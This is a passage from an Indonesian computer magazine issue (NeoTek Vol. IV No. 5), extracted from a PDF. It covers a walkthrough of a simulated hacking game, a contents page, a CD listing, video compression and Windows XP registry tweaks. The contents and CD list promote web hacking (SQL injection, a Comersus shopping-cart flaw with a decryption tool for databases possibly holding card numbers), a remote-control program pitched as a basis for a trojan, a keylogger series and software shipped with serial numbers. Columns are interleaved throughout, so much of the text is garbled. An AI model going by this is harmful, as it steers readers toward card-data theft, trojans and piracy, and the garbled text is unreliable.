Anda di halaman 1dari 50

NeoSoft

Dark Signs 9.01


Hacker Game Console
Apakah anda sudah merasa seorang hacker? Coba dulu game ini dan rasakan sendiri keasyikan
yang didapat dari game tersebut. Jangan hanya mengaku seorang hacker jika belum mencoba
game ini dan buktikan jika anda benar-benar seorang hacker.

D ark Signs adalah sebuah game yang mensimu-


lasi lingkungan sebuah jaringan dan mengijin-
Informasi yang didapat adalah adanya 2 port yang
terbuka pada securedigital.com yaitu port 25 dan 80.
kan anda memainkannya sebagai seorang hacker Connect
maupun seorang cracker. Game ini sebenarnya ma- Hacking ba-
sih dalam pengembangan, tetapi anda sudah dapat nyak meman-
memainkannya dan keasyikannya tetap terasa. faatkan port
Memulai Game 80, untuk itu
Dalam game ini, anda memiliki misi-misi yang harus coba connect
diselesaikan. Misi tersebut dikirimkan melalui email, ke port 80.
jadi anda nantinya akan memiliki sebuah account Anda berhasil
email setelah mendaftar sebagai new user. memasuki sis-
tem dengan
memanfaatkan
port 80. Ada
terdapat 5 opsi yang dapat anda pilih, berdasarkan
misi yaitu mendapatkan Internal Service Phone Number
maka ketikkan opsi nomor 5
Anda akan menemu-
kan kata-kata yang
tidak dimengerti dan
koneksi terputus, tapi
anda berhasil men-
dapatkan username
dan password admin:
Perhatikan Gambar di atas, untuk memulai perma- User: secure
inan anda diminta mengetikkan MAIL untuk check Password: digital
email dan melihat misi anda. Jika masih bingung, Trace
ketikkan HELP untuk melihat tutorial game. Sebe- Sekarang trace target
lumnya tekan sembarang tuts keyboard sebelum untuk mendapatkan
mengetikkan MAIL atau HELP. info mesin-mesin yang
berjalan pada target.
Ketikkan MAIL untuk memeriksa email. Akan mun- Kemudian scan mesin-mesin tersebut dan coba connect
cul beberapa opsi yang dapat dipilih. Ketikkan 1 un- ke mesin-mesin tersebut dan cari info sesuai misi anda.
tuk melihat email yang masuk, anda akan melihat Kelihatannya anda
ada 2 email. Ketikkan nomor 1 atau 2 untuk mem- belum beruntung ka-
baca email. Anda sebaiknya mulai dengan training rena belum menda-
mission, ketikkan 1 maka anda akan melihat isi email patkan hal yang ber-
dan melihat misi anda. arti, tapi tidak salah
anda coba kembali
Memulai Misi
melakukan trace
Untuk memulai menjalankan misi, keluar dari opsi pada target.
membaca email. Perhatikan petunjuk yang berada
Game belum berakhir
di bagian bawah untuk keluar dari opsi membaca
jika anda belum me-
email. Misi anda adalah mendapatkan Internal Ser-
nuntaskan misi anda.
vice Phone Number dan petunjuk untuk memulai
Bagaimana misi itu
hacking adalah Securedigital.com.
tuntas? Jika anda su-
Scan dah mendapatkan
Pertama kali yang perlu info Internal Service
dilakukan adalah melaku- Phone Number.
kan scan terhadap target
yaitu securedigital.com
untuk mencari informasi-informasi yang dibutuhkan.
HomePage
Harga NeoTek + CD:

Salam!
Rp20.000,- (P. Jawa)
Rp22.000,- (Luar P. Jawa)

N EOTE K
Dunia Teknologi Baru

Web Hacking
Bukan Hanya Deface Situs
Anatomi suatu serangan hacking

Footprinting

Scanning

Enumeration

Gaining Access

Escalating
• Pelaku deface situs sebenarnya mempunyai jiwa seni juga seperti contoh di atas,
Privilege sedangkan yang lebih berjiwa bisnis lebih berkonsentrasi pada pencurian database.

ahukah anda bahwa serangan terhadap suatu sistem


Pilfering T jaringan paling banyak terjadi melalui port 80, yang
pada dasarnya adalah port yang harus dibuka oleh
suatu situs web? Kerugian yang dapat diakibatkannya pun
Covering Tracks bukan main-main, terlebih lagi apabila yang kena serang itu
adalah situs web e-commerce.
Selain membahas web hacking secara umum, kali ini dibahas
Creating juga dua kasus: SQL Injection dan Kelemahan Comersus
Backdoors shopping cart.
Redaksi
Denial of redaksi@neotek.co.id
Service

Bagaimana menghubungi N EOTEK?


Lengkapi pengetahuan hacking
dan PC security anda dengan KONTRIBUSI ARTIKEL
redaksi@neotek.co.id ADMINISTRASI IKLAN
berlangganan majalah NeoTek: Tel. 021-5481457 Fax. 021-5329041
SURAT PEMBACA
Hubungi support@neotek.co.id SIRKULASI NEOTEK
WEBMASTER Tel. 021-5481457
KRISHNAdiSTRIBUTOR
webmaster@neotek.co.id ALAMAT REDAKSI
Tel. (021) 5835 0080 4 Cairnhill Rise
PEMASARAN
HP. (0816) 1187 111 (Boedi) Hedhi Sabaruddin, 0812-1891827 #05-01 The Cairnhill
Singapore 229740
email: CHATROOM DI DALNET Telp. +65-67386482
#neoteker email: kosasih@indo.net.id
krishnadistributor@neotek.co.id
MILIS PARA NEOTEKER
Kontak: Boedi Krishnadi http://groups.yahoo.com/group/majalahneotek

Vol. IV No. 05 NeoTek 1


Daftar Isi

Daftar Isi NeoTek Vol. IV No. 5


FOKUS VOL. IV NO. 5
NeoTekno
22 Web Hacking:
Kerawanan Port 80
Web hacking bukan sekedar deface de-
ngan memanfaatkan unicode bug, me-
lainkan juga karakteristik dasar seperti
opsi baca tulis pada protokol HTTP,
kelemahan dasar HTML form, bahaya
scripting, maupun kelemahan Microsoft
REGISTRY HACKING
HACKING SQL server dalam menangani input-
Utak-atik Windows XP input ilegal.

10 Bongkar Pasang 26 Web Hacking:


SQL Injection
NeoStart Komponen
Lengkapi atau hilangkan fitur tertentu
Membahas lebih jauh kelemahan
Microsoft SQL dalam memproses
dari standar Windows XP, termasuk illegal entry yang akibatnya sangat
6 Siapa dan Boleh Apa
Saja?
menggunakan Group Policies pada
Windows XP Professional.
berbahaya.

Bukan seperti pada Windows 9x/ME,


user login pada Windows XP bukan Stop Windows 30 Web Hacking:
sekedar kosmetik. 12 Messenger!
Comersus Bug
Bukan hanya database dari shopping
Ada berbagai cara mencegah Windows cart ini mudah di-download, tool un-
8 Lebih Lanjut dengan
Registry Messenger berjalan otomatis setelah tuk mendekripsi password database
ini juga sudah tersedia. Bagaimana
Windows XP di-start, termasuk cara
Cara terbaik menyetel perilaku Windows
uninstall yang oleh Microsoft memang bila database itu berisi nomor-nomor
XP sesuai keinginan anda.
disembunyikan. kartu kredit?

Situs NeoTek www.neotek.co.id


NeoStyle
Jadikan situs NeoTek sebagai pangkalan Anda berselancar
Instalasi Pinnacle
Link Langsung Layanan Rupa-rupa NeoTek 14 Studio 8/Hollywood FX
Kunjungi situs-situs yang dibahas di Channel #neoteker di Dalnet Jawaban terhadap banyaknya perta-
majalah NeoTek dengan sekali klik Ngobrol ramai-ramai sesama NeoTeker
lewat situs NeoTek. nyaan mengenai instalasi Pinnacle Stu-
Web Chat Room dio 8, khususnya sehubungan dengan
Kini tidak usah jauh-jauh untuk ngobrol instalasi Hollywood FX.
NeoTek versi PDF langsung dengan sesama NeoTeker
Kehabisan NeoTek di kota Anda?
Dapatkan saja versi PDF-nya. Gratis! Mailing List
Ini yang paling ramai. Segera ikutan
berbagi pengalaman berinternet!
45 Graphical Web
Design: Photoshop
Download Bagian pertama dari pembahasan
Tersedia juga download di situs NeoTeker Official Portal
NeoTek selain dari situs aslinya http://www.neoteker.or.id proyek membentuk situs web meng-
Situs komunikasi antar Neoteker. gunakan Photoshop, Image Ready, dan
Neoteker Internet Radio Dreamweaver.
http://dj.neoteker.or.id:8000

2 NeoTek Vol. IV No. 05


Daftar Isi

NeoTutor NeoSoft
Battlefield 1942

17 Java Workshop: 0 Secret Weapon of WW II


Java dan Port I/O First man shooting game
Pada dasarnya Java tidak dapat mem- dengan skenario dalam
baca/menulis port I/O. Untuk itu di- Perang Dunia II
perlukan bantuan Visual C++

19 Java Workshop:
NeoProfil
Remote Control Editorial Office
Aplikasi port I/O untuk Java, berupa
suatu program remote control ber- 38 Delphi Workshop: 3 4 Cairnhill Rise
Inno Installer #05-01 The Cairnhill
basis web dengan memanfaatkan Singapore 229740
Kemas software karya anda menjadi
Tomcat sebagai servlet container. Telp. +65-67386482
suatu installer tunggal agar mudah
digunakan dan didistribusikan meng-
VB Workshop: Business Office
32 Email Client Winsock
gunakan Inno Installer yang source
code-nya juga tersedia.
Gedung Cahaya Palmerah 503
Jl. Palmerah Utara III No. 9
Selain memanfaatkan dvmailer.dll, pro-
Jakarta 11480
gram email client juga dapat dibuat
dengan memanfaatkan Microsoft
Winsock Control.
40 Delphi Workshop:
Cyber Merpati
Telp. 021-5481457
Fax. 021-5329041
Membuat email client sendiri meng-
gunakan Delphi 7, yang mempunyai Pemimpin Umum
34 VB Workshop:
Remote Control
kelebihan fleksibilitas dibandingkan
dengan Outlook Express.Dengan email
Fachri Said
Pemimpin Redaksi
Remote control selalu menjadi topik client ini akan mudah mengubah-ubah Kosasih Iskandarsjah
menarik. Dengan Visual Basic anda parameter atau variabel sebelum me-
dapat membuat program remote Redaktur Ahli
ngirim email seperti X-Mailer, Extra
control sendiri yang dapat dikem- Onno W. Purbo
Header, dan lain-lain.
bangkan lebih lanjut menjadi trojan. Michael S. Sunggiardi
Pemimpin Usaha
36 VB Workshop:
Screen Saver
42 C++ Workshop:
Pengkodean Base64
Fahmi Oemar
Dadang Krisdayadi
Artikel penutup dari rangkaian artikel
Membuat screen saver sendiri yang Redaktur Pelaksana
mengenai membuat sendiri keylogger
akan menjadi komponen untuk pro- MA Rody Candera
menggunakan Visual C++
gram-program lainnya.
Sekretaris Redaksi
Marni
NeoRagam NeoTek Vol. IV No. 06 Webmaster
Klak Klik Supriyanto
4 Battlefield 1942
DarkSigns 0.91
Computer Forensics
Kenali bagaimana para cyber cop
Sirkulasi
Hacking Simulation Game Hedhi Sabaruddin, Denny
menangani kasus-kasus kriminalitas
Digital Video: dari satu format yang melibatkan penggunaan kom- Adm. Langganan
ke format lain puter serta apa saja tool yang digu- KRISHNAdiSTRIBUTOR
Daftar Isi CD NeoTek nakannya yang dapat diterima seba- Iklan dan Promosi
5 Tweak, Benchmark, Diagnostic
Windows XP Tweak Tool
gai evidence di pengadilan. Gianto Widianto
Game Benchmark Psikologis Hacking Keuangan
Diagnostic Tools Tool yang tepat hanya salah satu fak- Aswan Bakri
Graphical Web Design (I) tor saja dalam keberhasilan menem-
45 Mendayagu- bus suatu sistem jaring- Bank
nakan Photo- an. Social engineering Bank BNI
shop untuk ternyata jauh lebih ber-
membuat
a.n. PT NeoTek Maju Mandiri
web site ber-
peran dalam keberha- No. rekening 070.001709720.001
basis grafis. silan ini.
Bank BCA Matraman
(khusus untuk langganan)
a.n. Boedi Krishnadi
No. rekening 342-239-1611

Vol. IV No. 05 NeoTek 3


NeoRagam

Klak Klik Digital Video: Dari Satu Format ke Format Lain


OMPRESI ADALAH ILMU Berbagai Metode Kompresi me, seperti yang digunakan
GAME BULAN INI
Battlefield 1942
K dan seni mengurangi
ukuran file video men-
Untungnya berbagai kamera
pada VCD dan DVD yang meng-
gunakan kompresi MPEG.
video masa kini sudah di- • Mengekspresikan gambar
Secret Weapon of World War II jadi lebih kecil sehingga mu- lengkapi dengan berbagai
dah disimpan atau dipindahkan. obyek dalam bentuk matematis
168 MB jenis kompresi. sederhana, suatu cara yang di-
Kompresi terutama penting Berbagai jenis kompresai gunakan dalam teknologi baru
apabila anda perlu mentrans- ini bekerja menggunakan seperti pada video DivX atau
fer video dari kamera ke satu atau kombinasi dari
MPEG-4.
hard disk, CD, DVD, atau beberapa metode berikut: Tidak ada kompresi yang
bahkan mailbox seseorang. sempurna. Untuk gambar
• Menciutkan dimensi video,
Hal ini karena dalam video menjadikan video clip dimain- bermutu tinggi dan editing
terdapat 25 frame per detik kan dalam ukuran kecil. yang mudah, DV (digital
dan setiap frame ukurannya • Mengurangi frame rate dari video) tetap merupakan
414.720 pixel (720 x 576 25 fps menjadi 15 fps atau le- standar de facto, tapi MPEG-1
pixel), yang setiap pixel me- bih kecil, tetapi video akan tam- (VCD) dan MPEG-2 (DVD)
nda mengendalikan merlukan memory 8 bit. populer untuk home video.
A berbagai senjata
pak patah-patah.
• Menghilangkan warna dan
rahasia yang paling ganas Artinya satu frame yang Kini sudah terdapat banyak
belum dikompresi akan me- bayang-bayang yang tidak ter- aplikasi untuk mengkonversi
dan mematikan. Senjata lihat oleh mata telanjang, yang
ini didapat langsung dari makan memory 3,3MB dan suatu format video ke for-
merupakan metode yang digu- mat lainnya, suatu proses
labotatorium sekutu pada video PAL (25 fps) nakan oleh digital video (DV)
maupun poros Jerman- yang panjangnya satu jam dalam mengkompresi hasil bi- yang dikenal sebagai proses
Italia-Jepang dan sama akan memerlukan hard dikan dalam MiniDV tape. transcoding.
sekali belum diuji dalam disk 297 GB atau setara • Mengabaikan blok pixel yang
pertempuran. dengan 425 buah CD! identik pada suatu urutan fra-
Anda mendapat kesem-
patan mencoba Wasserfall KOMPRESI KAMERA VIDEO: BERBAGAI MACAM STANDAR
Guided Rocket, Natter
Rocket Plane, dan Rocket Standar Digunakan di Metode Pros Cons Terbaik untuk
Pack yang revolusioner di Kompresi
medan pertempuran.
Hidup atau mati akan DV • Kamera MiniDV • Menghilangkan • Near-broadcast qly • Ukuran file besar • Produksi video
sangat tergantung dari cara dan Digital 8 warna yang tak • Playback full 25fps • Set-top DV player dengan transisi
menangani senjata-senjata terlihat serta • Dimungkinkan harganya mahal • Title. musik, dan
rahasia ini. bayangan pada editing frame per (mulai 8 jutaan) narasi
Pentium III 500, RAM128
tiap frame frame
64MB 3D accelerator card • Didukung oleh ham-
pir semua software
Dark Signs 0.91
video-editing
Console Based Hacking Game MPEG-1 • Kamera digital • Menghilangkan • Ukuran file kecil • Pilihan software • Video greetings
21 MB still dengan warna yang tak (300-650MB/jam) video editing • E-mailing
movie-mode terlihat serta • Dapat dimainkan terbatas • Insert ke presen-
bayangan pada pada Windows • Gambar kecil dan tasi Power Point
tiap frame Media Player dan kadang-kadang
• Mengurangi Quick Time player patah-patah
ukuran frame • Editing yang frame
(352x240 pixel accurate tidak di-
atau lebih kecil) mungkinkan
dan frame rate
(12-15 fps)

MPEG-2 • Sony MicroMV • Menghilangkan • DVD quality • Dukungan editing • Bluetooth web-
ame yang mensimu- • JVC JY-HD10U warna yang tak • Ukuran file kecil terbatas menggu- casting (kamera
G lasi lingkungan net- • Hitachi DVD terlihat serta (2,4 GB/jam) nakan Sony Movie MicroMV).
work console, yang di sini Camcorders bayangan pada • Tidak lagi diperlu- Shaker, Ulead Video • DVD authoring
anda dapat berperan se- • Panasonic • Menjaga mutu kan kompresi un- Studio 7, dan Pinna-
bagai hacker atau cracker. VDR-M30 dan dengan mem- tuk DVD authoring cle Studio 8.
Fitur game ini mencakup SV-AV100 bandingkan fra- • Frame accurate
DScript language, line me dengan fra- editing sulit dilaksa-
commands, dan struktur me sebelumnya nakan.
direktori. maupun yang
Pentium 200, RAM16 berikutnya
MPEG-4 • Panasonic • Kompresi lebih • Ukuran file kecil • Tidak cocok untuk • Internet streaming
SV-AV100 lanjut dimung- (256MB/jam) editing • 3G mobile phone
kinkan dengan • Mutu gambar baik
mengekspresikan
gambar sebagai
bentuk dan teks-
tur matematis

4 NeoTek Vol. IV No. 05


NeoRagam

Tweak, Benchmark, Diagnostic daftar isi cd neotek


XP TWEAK TOOL
CD NeoTek kali ini terutama berisi tiga kategori yang berhu- LockIT XP lockitxp.exe Password
bungan erat dengan kinerja komputer anda, tweak, benchmark, NTFS DOS 3.0.2 ntfs30r.zip
dan diagnostic. NTFS for Floppy ntfsflp.zip
NTFS for Windows 98 ntfs98ro.exe
Windows XP Tweak Tool TweakNow Power Pack 2003 PowerPro.exe
Tweaking tool utama untuk Windows XP berasal dari Micro- Tweak-XP txp3setup
soft, yaitu Tweak UI yang merupakan bagian dari Windows XP Visual Tools 1.8.5 xpvt.zip Serial
XP Power Toys. Selain itu disediakan juga TweakNow Power
Pack 2003, dan Tweak-XP. Untuk melengkapi arsenal anda, MICROSOFT POWER TOYS XP
disediakan juga LockIT XP dan XP Visual Tools, lengkap CmdHere CmdHerePowertoySetup.exe
dengan serial numbernya. Deskman DeskmanPowertoySetup.exe
HtmlGen HtmlgenPowertoySetup.exe
Game Benchmark Image Resizer ImageResixerPowertoySetup.exe
Bukan rahasia lagi kalau home computer yang digunakan untuk Magnifier MagnifierPowertoySetup.exe
game sekarang harus jauh lebih powerful dibandingkan kom- Power Calc PowerCalcPowertoySetup.exe
puter untuk bisnis. Tidak heran apabila alat untuk mengujinya Slide Show SlideShowPowertoySetup.exe
pun berupa game pula. Quake III Arena dan Unreal Tourna- Task Switch TaskswitchPowertoySetup.exe
ment 2003 sudah menjadi standar de facto untuk pengujian Timer Shot TimershotPowertoySetup.exe
benchmarking terhadap hardware anda. Tweak UI TweakUiPowertoySetup.exe
Quark III Arena. Utilitas benchmarking yang disertakan pada Tweak UI for Itanium TweakUiPowertoySetup_ia64.exe
game ini digunakan untuk menguji kemampuan grafis. Hasil-
nya berupa kinerja keseluruhan sistem anda dalam frame per GAME
detik. Install dan launch game ini dan tekan tombol tilde (~) Battlefield 1942 demo bg1942sw.exe
untuk membuka jendela yang memanggil Quake console. DarkSigns 0.91 full darksign.exe
Didalam console ini ketikkan timedemo 1 and tekan Enter. GAME BENCHMARKING TOOL
Keluar dari console, pilih Demos option dan jalankan Demo1. 3D mark 03 3dmark03.exe
Setelah pengujian berakhir, tekan tombol tilde untuk mengung- PC Mark 4.10 pcmark04.exe
kap frame rate-nya. Quake III Arena quake3.exe
Unreal Tournament 2003. Pada game arena combat game yang Unreal Tournament 2003 ut2003.zip
tak mengenal kasihan ini telah tersedia build-in benchmarking UT 2003 Bechmarking ut2k3_bench_v20
tool yang memungkinkan anda menjalankan serangkaian time-
demo, dan mencatat record-nya untuk anda. Terdapat dua mode DIAGNOSTIC TOOLS
uji: Flyby, yang membawa anda jalan-jalan ke dunia game dan CPU-Z cpuz120a.zip
mencatat skor frame rate sistem anda dan Botmatch, pegujian Diskspeed ds32.zip
yang lebih berorientasi game serta pengujian CPU. Begitu se- Hardinfo 2002 h2002pro hardinfo
lesai menginstal game ini, masuk ke direktori program utama Intel Chipset Utility chiputil.exe
UT2003. Secara default terinstal di root directory C:. Setelah Memtest86 3.0 memt30.zip
mendapatkan folder ini, double-click dan akan tampil isinya. Motherboard Monitor 5.3.5.1 mbm5351.exe
Cari subfolder System. Double-click, akan terlihat Benchmark.exe Sisoft Sandra Std. 2004 san2004.exe
atau Benchmark bile ekstensinya disembunyikan. Double-click SECURITY/PRIVACY
icon ini untuk menjalankan program benchmarking. Ad-Aware 6 1.8.1 aaw6181.exe
Hard OCP Unreal Tournament 2003 Benchmark. Digunakan Anti Trojan 5.5 atro55en.exe
untuk menguji graphics card mutakhir. Untuk menguji grafik Cache & Cookie Washer ccwsetup.exe
anada sendiri install program ini setelah menginstal Unreal Ella Spam Blocker ella.exe
Tournament 2003 demo. Mail Washer pro 3.1 mailwash.exe
3DMark03 build 340. Tool ini mengkombinasikan dukungan Netkeys Ultra netkeys4.exe
DirectX 9.0a dengan sejumlah grafis kompleks untuk menun- Smart Popup Killer smartpop.exe
jukkan hasil benchmark kinerja grafis 3D dari sistem anda. Spam Catcher for 98/ME sc98me.exe
Spam Catcher for XP sc2kntxp.exe
PCMark04 1.0. Suatu application-based benchmark dan meru- Spybot Search & Destroy spybot12.exe
pakan tool yang amat baik untuk mengukur kinerja PC secara WinLock 3.2 full winlock32.zip
keseluruhan. menggunakan bagian-bagian dari aplikasi yang WinLock 4.0 Trial winlock4.zip
sebenarnya digunakan dan bukan satu aplikasi besar saja. Zone Alarm 3.7 1.9.3 za193.exe
Diagnostic Tools INSTALLER
CPU-Z. Menampilkan informasi prosesor anda, mencakup nama, Inno Setup 3.0.7 isetup-3.0.7.exe
pemasok, core stepping and process, voltase, internal/external Inno Setup 4.1.4 isetup-4.1.4.exe
clock, informasi cache dan lain-lain.
DiskSpeed32. Mengukur kecepatan hard disk dalam lingkungan PROYEK
Win32. Ditampilkan dalam bentuk grafis kecepatan per silinder. Base64 base64.zip
Intel Chipset Utilities. Menampilkan informasi mengenai chipset Comersus Bug comersusCrack.zip
yang anda gunakan. DecryptComersus.exe
Memtest86 3.0. Penguji memory untuk komputer berarsitektur Email Client Delphi Cyber Merpati.zip
x86. Uji memory BIOS hanya untuk pengecekan cepat dan banyak PakPos212Public.zip
hal yang terdeteksi. Email Client VB Winsock SalomeWinsock.exe
Motherboard Monitor 5.3.5.1. Menampilkan informasi dari sensor salomews.zip
chip pada motherboard di Windows system tray. Mendukung Java I/O java_io.zip
banyak kombinasi jenis chipsets dan sensor chip. Java Remote Control java_remote.zip
SANDRA Standard 2004 (System Analyzer/Diagnostic and Re- VB Remote Control Client.zip
porting Assistant); seperangkat tool system diagnostic dan bench- Server.zip
marking yang dirancang untuk membantu anda menjalankan VB Screen Saver ColorCircvarious.exe
komputer pada kinerja puncaknya. vbss.zip
HARDiNFO 2002 Professional. Aplikasi lengkap sistem informasi,
diagnostik, benchmark, and computer management application.
Register di www.pcuser.com.au/hardinfo untuk serial number.

Vol. IV No. 05 NeoTek 5


NeoStart

UTAK-ATI K WI N DOWS X P
Siapa dan Boleh Apa Saja?
Windows XP yang merupakan keluarga Windows NT seperti juga Windows 2000 maupun
Windows Server 2003 kini menjadi sistem operasi yang paling banyak digunakan, khususnya
XP Home Edition dan XP Professional. Bisa apa saja dengan Windows XP?

WINDOWS 9X ATAU ME YANG USER menampilkan semua user yang ada. Untuk itu, anda dapat
B
ERBEDA DENGAN
access pada dasarnya hanya merupakan polesan mengubah cara login dengan harus memasukkan baik user
kosmetik, pada Windows XP dengan adanya admin- name maupun password, sehingga menjadi lebih aman.
istrator dan limited account, user policy dapat benar-benar Software tertentu yang bila dijalankan akan terhubung
diterapkan. Namun login menu tidak begitu aman, sebab dengan identitas pemakai seperti mIRC, Yahoo Messenger,

Administrator atau User Biasa?

USER ACCOUNT
1 Pilih Start > Control Panel dan double click User Accounts. Pilih Change the way user log
on or off dan untick use the welcome screen. Tekan Windows+L untuk melihat hasilnya.

PROPERTIES SUATU PROGRAM DIFFERENT CREDENTIALS TIDAK SEMUA PROGRAM


2 Klik kanan pada icon suatu pro-
gram, misalnya mIRC, lalu pilih
3 Pada jendela Advanced Properties,
tick Run with different credentials
4 Hal yang sama dapat diterapkan
pada Yahoo Messenger, namun
Properties untuk menampilkan dan klik OK. Kini setiap kali men- tidak dapat diterapkan untuk
jendela mIRC Properties. Pada tab jalankan mIRC akan tampil jendela beberapa software dari Microsoft
Shortcut, klik tombol Advanced Run As yang menanyakan sebagai seperti Outlook Express ataupun
yang akan menampilkan jendela siapa anda akan menjalankan pro- software yang termasuk dalam
Advanced Properties. gram ini sebagai siapa. Memudah- Microsoft Office.
kan apabila mempunyai beberapa
nick name.

6 NeoTek Vol. IV No. 05


NeoStart

ataupun Outlook, dapat disetel agar setiap dijalankan akan Registry entry-nya adalah DWORD value. Value 1 artinya
menanyakan dulu akan dijalankan oleh siapa. Opsi ini tidak enable dan value 0 artinya disable. Anda perlu membentuk
dapat diterapkan pada beberapa software Microsoft seperti sendiri DWORD value yang bersangkutan, yang untuk
Outlook Express ataupun Microsoft Office. NoChangeStartMenu dicontohkan pada langkah-langkah.
Registry Value Policy
Utak-atik Registri NoSimpleStartMenu Disable simple Start Menu dan
Lewat registri banyak hal mengenai perilaku dan cara kerja mengharuskan classic Start Menu.
Windows XP dapat disetel. Salah satunya adalah memberi NoStartMenuMFUprogramsList Membuang program yang sering
batasan terhadap limited user dalam mengakses Start Menu. digunakan dari Start Menu.
Ada beberapa batasan yang dapat diterapkan, dan semua- NoStartMenuMorePrograms Membuang daftar More Programs
nya dilakukan pada cabang regtistry: dari Start Menu.
GreyMSIAds Menampilkan program yang belum
HKEY_CURRENT_USER\Software\Microsoft\Windows\ selesai instal sebagai gray di Start
CurrentVersion\Policies\Explorer Menu.
Apabila batasan hendak dilakukan bukan user per user, NoWindowsUpdate Membuang link Windows Update
melainkan secara keseluruhan, lakukan perubahan pada dari Start Menu.
HKEY_LOCAL_MACHINE. NoSMMyDocs Membuang folder MyDocuments
dari Start Menu.

Mengunci Start Menu

JALANKAN REGEDIT BUAT ENTRI BARU


1 Dari Start > Run... ketikkan regedit
dan klik OK untuk menampilkan
2 Klik kanan dan pada pane kanan
pilih New > DWORD Value yang
Registry Editor. Dari sini masuk ke akan membentuk New Value #1.
HKEY_CURRENT_USER\Software\ Klik kanan pada value baru itu dan
Microsoft\Windows\CurrentVersion\ pilih Rename. Kemudian ganti
Policies\Explorer menjadi NoChangeStartMenu.
Setelah itu klik kanan lagi pada
NoChangeStartMenu dan ubah
value data menjadi 1 dan klik OK.

DisablePersonalDirChange Mencegah user mengubah path ke


folder My Documents
NoRecentDocsMenu Membuang folder Recent Docu
ments dari Start Menu.
MaxRecentDocs Menetapkan banyaknya shortcut
yang dapat ditampilkan pada
submenu Recent Documents.
ClearRecentDocsonExit Menghapus semua shortcut ke Re
cent Documents begitu user log off.
NoFavoritesMenu Mencegah user menambahkan
artikel Favorite pada Start Menu.
NoNetworkConnections Menghilangkan artikel Network
Connection dari Start Menu.
NoStartMenuNetworkPlaces Menghilangkan artikel Network
TAMPILAN REGISTRY YANG BARU
3 Tampak kini bahwa Explorer key sudah berisi DWORD value
yang baru yaitu NoChangeStartMenu dengan data value 1, NoFind
Places dari Start Menu.
Menghilangkan artikel Search dari
yang artinya kini user yang bersangkutan tidak lagi dapat Start Menu.
mengubah-ubah Start menu maupun taskbar dengan cara NoRun Menghilangkan kemampuan men
drag-and-drop. Cara lain untuk mengubah Start menu dan jalankan program melalui opsi
taskbar masih dimungkinkan. Run pada Start Menu.
NoClose Disable dan menghilangkan tom
bol Turn Off Computer.

Vol. IV No. 05 NeoTek 7


NeoStart

UTAK-ATI K WI N DOWS X P
Lebih Lanjut dengan Registry
Registry adalah jalan pintas untuk menyetel Windows XP agar berperilaku dan bekerja seperti
yang anda inginkan. Namun cara ini berisiko, salah-salah komputer anda malah crash.
Mem-backup registry adalah jalan yang sangat dianjurkan.

AIN-MAIN DENGAN REGISTRY MEMANG RISKAN SEBAB Menjaga Privacy


M sewaktu mengutak-atik semua opsi atau setelan itu
dapat saja Windows malah crash akibat salah mene-
Anda juga dapat menjaga privacy anda agar orang lain
tidak seenaknya ngintip apa yang telah anda lakukan pada
tapkan opsi. Namun bila tahu apa yang harus dikerjakan,
komputer dengan jalan mengosongkan paging file (virtual
cara ini sangat efektif untuk mencapai yang anda inginkan.
memory) setiap kali shut down. Dapatkan:
Untuk membuat perubahan-perubahan pada registry anda
HKEY_LOCAL_MACHINE\System\CurrentControlSet\
harus login sebagai administrator, yang dilakukan melalui
Control\SessionManager\Memory Management
regedit (S
Start > Run lalu ketik regedit). Sebelum melaku-
kan perubahan, ada baiknya memanfaatkan fungsi File > dan tambahkan subkey ClearPageFileAtShutDown dengan
Export untuk mem-backup registry anda. Praktek yang sa- DWORD value 00000001.
ngat dianjurkan walaupun anda sangat yakin akan kemam- Pada bagian ini juga dapatkan DisablePagingExecutive. Bila
puan anda sebagai registry hacker. ini anda disable (dengan menetapkan setting menjadi 1 dan
bukannya 0), anda artinya memerintahkan Windows agar
Menampilkan Pesan Setiap Kali Startup tidak memindahkan file ke hard disk. Ini terutama berguna
Untuk secara otomatis menampilkan pesan setiap kali apabila anda mempunyai RAM lebih dari 256MB, sehingga
Windows startup, jalankan regedit dan dapatkan Windows akan lebih responsif.
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Untuk membuat Windows lebih responsif lagi, dapatkan
NT\CurrentVersion\Winlogon pula disini LargeSystemCache dan tetapkan nilainya men-
jadi 1. Sekali lagi ini dapat dilakukan apabila anda mempu-
Ubah nilai dari key LegalNoticeCaption misalnya isikan nyai RAM yang besar. Apabila tidak, sebaiknya jangan
dengan Pesan dari Windows XP (atau namakan apa saja) mengubah-ubah subkey ini.
Lalu ubah juga value dari key LegalNoticeText dengan teks
apa saja yang anda inginkan.
Membatasi Program yang Start Otomatis
Suatu jendela yang namanya Pesan dari Windows XP akan
Sewaktu Windows boot up, beberapa program akan dijalan-
tampil sebelum menampilkan logon screen dan dapat di-
kan secara otomatis. Sering kali ada program yang tidak
gunakan untuk berbagai kepentingan seperti pengingat,
terlalu perlu atau program yang entah dari mana sudah
humor, ataupun mengolok-olok.
terdapat di situ.

Ekspor dan Impor Registry untuk Backup dan Restore

MEM-BACKUP REGISTRY SAVE SEBAGAI FILE .REG RESTORE REGISTRY


1 Dari Start > Run... ketikkan regedit
dan andapun menjalankan
2 Akan tampil jendela Export Registry
File yang meminta anda menyim-
3 Anda dapat me-restore registry
dengan File > Import... dan pilih
Registry Editor. Sebelum melaku- pan registry ini sebagai suatu file backup.reg tadi untuk di-load
kan perubahan apa-apa, backup .reg. Namakan misalnya sebagai kembali ke komputer anda.
registry yang ada dengan me- backup.reg.
milih File > Export...

8 NeoTek Vol. IV No. 05


NeoStart

Untuk membatasi program-program apa saja yang perlu Shared Document


dijalankan secara otomatis sewaktu boot up, dapatkan:
Folder Shared Documents yang dapat dilihat dan diakses
HKEY_CURRENT_USER\Software\Microsoft\Windows\ oleh semua orang adalah fitur baru pada Windows XP, te-
CurrentVersion\Run tapi tidak semua orang menyukainya.
Program-program yang terlihat pada pane kanan adalah Shared Documents juga ditampilkan pada bagian atas
yang akan secara otomatis dijalankan apabila Windows jendela My Computer di bawah judul Files Stored On This
boot up. Apabila yakin tidak diperlukan, klik kanan pada Computer.
nama program itu dan pilih Delete.
Apabila anda tidak ingin folder ini ditampilkan disini,
Ada baiknya juga periksa: dapatkan bagian registry:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows\CurrentVersion\Run Windows\CurrentVersion\Explorer\My Computer\
untuk alasan yang sama. Tapi di sini kalau anda tidak yakin NameSpace\DelegateFolders
apa yang harus dilakukan, sebaiknya jangan ada yang diubah. dan dapatkan subkey
{59031a47-3f72-44a7-89c5-5595fe6b30ee}
Mencegah Bluescreen of Death dan hapus subkey ini.
Secara keseluruhan, Windows XP jauh lebih stabil diban-
